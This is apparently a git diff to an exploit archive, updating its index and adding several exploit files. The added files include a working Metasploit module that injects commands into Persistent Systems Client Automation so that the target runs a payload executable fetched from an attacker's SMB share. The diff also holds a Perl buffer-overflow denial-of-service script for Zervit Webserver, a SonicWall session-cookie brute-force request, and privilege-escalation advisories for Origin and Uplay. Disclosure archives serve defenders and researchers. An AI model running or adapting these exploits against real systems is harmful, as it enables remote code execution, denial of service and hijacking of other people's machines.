diff --git a/files.csv b/files.csv index 5d5bc5af5..dd72e571e 100755 --- a/files.csv +++ b/files.csv @@ -143,7 +143,7 @@ id,file,description,date,author,platform,type,port 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow Exploit",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x ""SITE CHMOD"" Command Remote Exploit",2004-01-27,lion,windows,remote,21 -151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 +151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - ""mremap()"" Local Proof-of-Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 @@ -8222,7 +8222,7 @@ id,file,description,date,author,platform,type,port 8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0 8719,platforms/asp/webapps/8719.py,"Dana Portal Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0 8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0 -8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 +8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0 8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0 8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0 @@ -32618,6 +32618,8 @@ id,file,description,date,author,platform,type,port 36185,platforms/php/webapps/36185.txt,"WordPress Pixiv Custom Theme 2.1.5 'cpage' Parameter Cross Site Scripting Vulnerability",2011-09-29,SiteWatch,php,webapps,0 36186,platforms/php/webapps/36186.txt,"WordPress Morning Coffee Theme 3.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 36187,platforms/php/webapps/36187.txt,"WordPress Black-LetterHead Theme 1.5 'index.php' Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 +36188,platforms/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,windows,local,0 +36189,platforms/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Local Privilege Escalation",2015-02-26,LiquidWorm,windows,local,0 36191,platforms/php/webapps/36191.txt,"WordPress RedLine Theme 1.65 's' Parameter Cross Site Scripting Vulnerability",2011-09-30,SiteWatch,php,webapps,0 36192,platforms/php/webapps/36192.txt,"A2CMS 'index.php' Local File Disclosure Vulnerability",2011-09-28,St493r,php,webapps,0 36193,platforms/php/webapps/36193.txt,"WordPress WP Bannerize 2.8.7 'ajax_sorter.php' SQL Injection Vulnerability",2011-09-30,"Miroslav Stampar",php,webapps,0 @@ -32631,3 +32633,5 @@ id,file,description,date,author,platform,type,port 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 'admin/index.php' Cross-Site Scripting Vulnerability",2011-10-03,"Stefan Schurtz",php,webapps,0 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 index.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0 +36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 +36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465 diff --git a/platforms/hardware/remote/36205.txt b/platforms/hardware/remote/36205.txt new file mode 100755 index 000000000..540945ed9 --- /dev/null +++ b/platforms/hardware/remote/36205.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/49930/info + +SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability. + +Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible. + +GET /log.wri HTTP/1.0 +Host: 123.123.123.123 +Connection: close +User-Agent: brute-forcing +Cookie: SessId=111111111 \ No newline at end of file diff --git a/platforms/windows/dos/8721.pl b/platforms/windows/dos/8721.pl index fdde27564..d06cc2580 100755 --- a/platforms/windows/dos/8721.pl +++ b/platforms/windows/dos/8721.pl @@ -1,23 +1,23 @@ -#!/usr/bin/perl -# Zervit webserver 0.4 Bof Poc -# make it just for fun :s -use LWP::Simple; -use LWP::UserAgent; - -if (@ARGV < 2) { - print("Usage: $0 \n"); - print("TARGETS are\n "); - print("Example: perl $0 127.0.0.1 777 \n"); - exit(1); - } - ($target, $port) = @ARGV; - print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n"); - print("Attacking $target on port $port!\n"); - print("Ddossing .......\n"); - $dos ="\x41" x 1000 ; - $temp="/" x 2; - my $url= "http://". $target. ":" . $port .$temp . $dos; - $content=get $url; - print("\n Server Bofed"); - -# milw0rm.com [2009-05-18] +#!/usr/bin/perl +# Zervit webserver 0.4 Bof Poc +# make it just for fun :s +use LWP::Simple; +use LWP::UserAgent; + +if (@ARGV < 2) { + print("Usage: $0 \n"); + print("TARGETS are\n "); + print("Example: perl $0 127.0.0.1 777 \n"); + exit(1); + } + ($target, $port) = @ARGV; + print("Zervit Webserver 0.04 bof xpl : Coded by Stack!\n"); + print("Attacking $target on port $port!\n"); + print("Ddossing .......\n"); + $dos ="\x41" x 1000 ; + $temp="/" x 2; + my $url= "http://". $target. ":" . $port .$temp . $dos; + $content=get $url; + print("\n Server Bofed"); + +# milw0rm.com [2009-05-18] diff --git a/platforms/windows/local/36188.txt b/platforms/windows/local/36188.txt new file mode 100755 index 000000000..fcdf03f0f --- /dev/null +++ b/platforms/windows/local/36188.txt @@ -0,0 +1,240 @@ +?Electronic Arts Origin Client 9.5.5 Multiple Privilege Escalation Vulnerabilities + +Vendor: Electronic Arts Inc. +Product web page: https://www.origin.com +Affected version: 9.5.5.2850 (353317) + 9.5.3.636 (350385) + 9.5.2.2829 (348065) + +Summary: Origin (formerly EA Download Manager (EADM)) is digital distribution +software from Electronic Arts that allows users to purchase games on the internet +for PC and mobile platforms, and download them with the Origin client (formerly +EA Download Manager, EA Downloader and EA Link). + +Desc#1: The application is vulnerable to an elevation of privileges vulnerability +which can be used by a simple user that can change the executable file with a +binary of choice. The vulnerability exist due to the improper permissions, +with the 'F' flag (full) for the 'Everyone' and 'Users' group, for the +'OriginClientService.exe' binary file, and for all the files in the 'Origin' +directory. The service is installed by default to start on system boot with +LocalSystem privileges. Attackers can replace the binary with their rootkit, +and on reboot they get SYSTEM privileges. + +Desc#2: Origin client service also suffers from an unquoted search path issue +impacting the 'Origin Client Service' service for Windows deployed as part of +the Origin Thin Setup bundle. This could potentially allow an authorized but +non-privileged local user to execute arbitrary code with elevated privileges +on the system. A successful attempt would require the local user to be able to +insert their code in the system root path undetected by the OS or other security +applications where it could potentially be executed during application startup +or reboot. If successful, the local user’s code would execute with the elevated +privileges of the application. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Microsoft Windows 7 Ultimate SP1 (EN) + + +Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5231 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5231.php + + +14.12.2014 + + + +************************************************************************** +C:\>sc qc "Origin Client Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Origin Client Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Origin\OriginClientService.exe <-----< Unquoted path + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Origin Client Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>cacls "C:\Program Files (x86)\Origin\OriginClientService.exe" +c:\Program Files (x86)\Origin\OriginClientService.exe Everyone:(ID)F <-----< Full control + BUILTIN\Users:(ID)F <-----< Full control + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + + +C:\> +************************************************************************** + +************************************************************************** +C:\>cscript XCACLS.vbs "C:\Program Files (x86)\Origin\*.exe" +Microsoft (R) Windows Script Host Version 5.8 +Copyright (C) Microsoft Corporation. All rights reserved. + +Starting XCACLS.VBS (Version: 5.2) Script at 15.12.2014 19:46:41 + +Startup directory: +"C:\" + +Arguments Used: + Filename = "C:\Program Files (x86)\Origin\*.exe" + + + +************************************************************************** +File: C:\Program Files (x86)\Origin\EAProxyInstaller.exe + +Permissions: +Type Username Permissions Inheritance + +Allowed \Everyone Full Control This Folder Only +Allowed BUILTIN\Users Full Control This Folder Only +Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only +Allowed BUILTIN\Administrators Full Control This Folder Only + +No Auditing set + +Owner: BUILTIN\Administrators +************************************************************************** + +************************************************************************** +File: C:\Program Files (x86)\Origin\igoproxy64.exe + +Permissions: +Type Username Permissions Inheritance + +Allowed \Everyone Full Control This Folder Only +Allowed BUILTIN\Users Full Control This Folder Only +Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only +Allowed BUILTIN\Administrators Full Control This Folder Only + +No Auditing set + +Owner: BUILTIN\Administrators +************************************************************************** + +************************************************************************** +File: C:\Program Files (x86)\Origin\Origin.exe + +Permissions: +Type Username Permissions Inheritance + +Allowed \Everyone Full Control This Folder Only +Allowed BUILTIN\Users Full Control This Folder Only +Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only +Allowed BUILTIN\Administrators Full Control This Folder Only + +No Auditing set + +Owner: BUILTIN\Administrators +************************************************************************** + +************************************************************************** +File: C:\Program Files (x86)\Origin\OriginClientService.exe + +Permissions: +Type Username Permissions Inheritance + +Allowed \Everyone Full Control This Folder Only +Allowed BUILTIN\Users Full Control This Folder Only +Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only +Allowed BUILTIN\Administrators Full Control This Folder Only + +No Auditing set + +Owner: BUILTIN\Administrators +************************************************************************** + +************************************************************************** +File: C:\Program Files (x86)\Origin\OriginCrashReporter.exe + +Permissions: +Type Username Permissions Inheritance + +Allowed \Everyone Full Control This Folder Only +Allowed BUILTIN\Users Full Control This Folder Only +Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only +Allowed BUILTIN\Administrators Full Control This Folder Only + +No Auditing set + +Owner: BUILTIN\Administrators +************************************************************************** + +************************************************************************** +File: C:\Program Files (x86)\Origin\OriginER.exe + +Permissions: +Type Username Permissions Inheritance + +Allowed \Everyone Full Control This Folder Only +Allowed BUILTIN\Users Full Control This Folder Only +Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only +Allowed BUILTIN\Administrators Full Control This Folder Only + +No Auditing set + +Owner: BUILTIN\Administrators +************************************************************************** + +************************************************************************** +File: C:\Program Files (x86)\Origin\OriginUninstall.exe + +Permissions: +Type Username Permissions Inheritance + +Allowed \Everyone Full Control This Folder Only +Allowed BUILTIN\Users Full Control This Folder Only +Allowed NT AUTHORITY\SYSTEM Full Control This Folder Only +Allowed BUILTIN\Administrators Full Control This Folder Only + +No Auditing set + +Owner: BUILTIN\Administrators +************************************************************************** + + +Operation Complete +Elapsed Time: 0,1796875 seconds. + +Ending Script at 15.12.2014 19:46:41 + + + +C:\> +************************************************************************** + +-- + +************************************************************************** +Changed permissions and service binary path name (vendor fix): +-------------------------------------------------------------- + +C:\>sc qc "Origin Client Service" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Origin Client Service + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files (x86)\Origin\OriginClientService.exe" <-----< Quoted path + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Origin Client Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>icacls "C:\Program Files (x86)\Origin\OriginClientService.exe" +C:\Program Files (x86)\Origin\OriginClientService.exe NT AUTHORITY\SYSTEM:(I)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Users:(I)(RX) <-----< Read and execute + +Successfully processed 1 files; Failed processing 0 files + +C:\> +************************************************************************** diff --git a/platforms/windows/local/36189.txt b/platforms/windows/local/36189.txt new file mode 100755 index 000000000..db5240ac2 --- /dev/null +++ b/platforms/windows/local/36189.txt @@ -0,0 +1,49 @@ +? +Ubisoft Uplay 5.0 Insecure File Permissions Local Privilege Escalation + + +Vendor: Ubisoft Entertainment S.A. +Product web page: http://www.ubi.com +Affected version: 5.0.0.3914 (PC) + +Summary: Uplay is a digital distribution, digital rights management, +multiplayer and communications service created by Ubisoft to provide +an experience similar to the achievements/trophies offered by various +other game companies. + + - Uplay PC is a desktop client which replaces individual game launchers + previously used for Ubisoft games. With Uplay PC, you have all your Uplay + enabled games and Uplay services in the same place and you get access to + a whole new set of features for your PC games. + +Desc: Uplay for PC suffers from an elevation of privileges vulnerability +which can be used by a simple user that can change the executable file +with a binary of choice. The vulnerability exist due to the improper +permissions, with the 'F' flag (Full) for 'Users' group, making the +entire directory 'Ubisoft Game Launcher' and its files and sub-dirs +world-writable. + +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5230 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5230.php + +Vendor: http://forums.ubi.com/forumdisplay.php/513-Uplay + + +19.02.2015 + +-- +C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe +C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + test-PC\yousir:(ID)F + + +C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher> diff --git a/platforms/windows/remote/151.txt b/platforms/windows/remote/151.txt index 73d09a972..f431de433 100755 --- a/platforms/windows/remote/151.txt +++ b/platforms/windows/remote/151.txt @@ -36,6 +36,6 @@ function backbutton() { // Launch backbutton exploit on load if (confirm("Press OK to run backbutton exploit!")) backbutton(); - - -# milw0rm.com [2004-02-04] + + +# milw0rm.com [2004-02-04] diff --git a/platforms/windows/remote/36206.rb b/platforms/windows/remote/36206.rb new file mode 100755 index 000000000..adb207aa7 --- /dev/null +++ b/platforms/windows/remote/36206.rb @@ -0,0 +1,151 @@ +# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability +# Date: 2014-10-01 +# Exploit Author: Ben Turner +# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/ +# Version: 7.9, 8.1, 9.0, 9.1 +# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008 +# CVE-2015-1497 +# CVSS: 10 + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + # Exploit mixins should be called first + include Msf::Exploit::Remote::SMB + include Msf::Exploit::EXE + include Msf::Auxiliary::Report + + # Aliases for common classes + SIMPLE = Rex::Proto::SMB::Client + XCEPT = Rex::Proto::SMB::Exceptions + CONST = Rex::Proto::SMB::Constants + + + def initialize + super( + 'Name' => 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability', + 'Description' => %Q{ + This module exploits PS Client Automation, by sending a remote service install and creating a callback payload. + }, + 'Author' => [ 'Ben Turner' ], + 'License' => BSD_LICENSE, + 'References' => + [ + ], + 'Privileged' => true, + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'EXITFUNC' => 'process' + }, + 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, + 'Platform' => ['win'], + 'Targets' => + [ + [ 'PS Client Automation on Windows XP, 7, Server 2003 & 2008', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'January 10 2014' + ) + + register_options([ + OptString.new('SMBServer', [true, 'The IP address of the SMB server', '192.168.1.1']), + OptString.new('SMBShare', [true, 'The root directory that is shared', 'share']), + Opt::RPORT(3465), + ], self.class) + + end + + def exploit + + createservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" + createservice << "Nvdkit.exe service install test -path \"c:\\windows\\system32\\cmd.exe /c \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe\"" + createservice << "\x22\x00\x00\x00" + + startservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" + startservice << "Nvdkit service start test" + startservice << "\x22\x00\x00\x00" + + removeservice = "\x00\x24\x4D\x41\x43\x48\x49\x4E\x45\x00\x20\x20\x20\x20\x20\x20\x20\x20\x00" + removeservice << "Nvdkit service remove test" + removeservice << "\x22\x00\x00\x00" + + def filedrop() + begin + origrport = self.datastore['RPORT'] + self.datastore['RPORT'] = 445 + origrhost = self.datastore['RHOST'] + self.datastore['RHOST'] = self.datastore['SMBServer'] + connect() + smb_login() + print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\installservice.exe'...") + self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") + exe = generate_payload_exe + fd = smb_open("\\installservice.exe", 'rwct') + fd << exe + fd.close + + self.datastore['RPORT'] = origrport + self.datastore['RHOST'] = origrhost + + rescue Rex::Proto::SMB::Exceptions::Error => e + print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") + abort() + end + end + + def filetest() + begin + origrport = self.datastore['RPORT'] + self.datastore['RPORT'] = 445 + origrhost = self.datastore['RHOST'] + self.datastore['RHOST'] = self.datastore['SMBServer'] + connect() + smb_login() + print_status("Checking the remote share: \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") + self.simple.connect("\\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}") + file = "\\installservice.exe" + filetest = smb_file_exist?(file) + if filetest + print_good("Found, upload was succesful! \\\\#{datastore['SMBServer']}\\#{datastore['SMBShare']}\\#{file}\n") + else + print_error("\\\\#{datastore['SMBServer']}\\#{file} - The file does not exist, try again!") + + end + + self.datastore['RPORT'] = origrport + self.datastore['RHOST'] = origrhost + + rescue Rex::Proto::SMB::Exceptions::Error => e + print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") + abort() + end + end + + begin + filedrop() + filetest() + connect() + sock.put(createservice) + print_status("Creating the callback payload and installing the remote service") + disconnect + sleep(5) + connect() + sock.put(startservice) + print_good("Exploit sent, awaiting response from service. Waiting 15 seconds before removing the service") + disconnect + sleep(30) + connect + sock.put(removeservice) + disconnect + + rescue ::Exception => e + print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") + abort() + + end + end +end +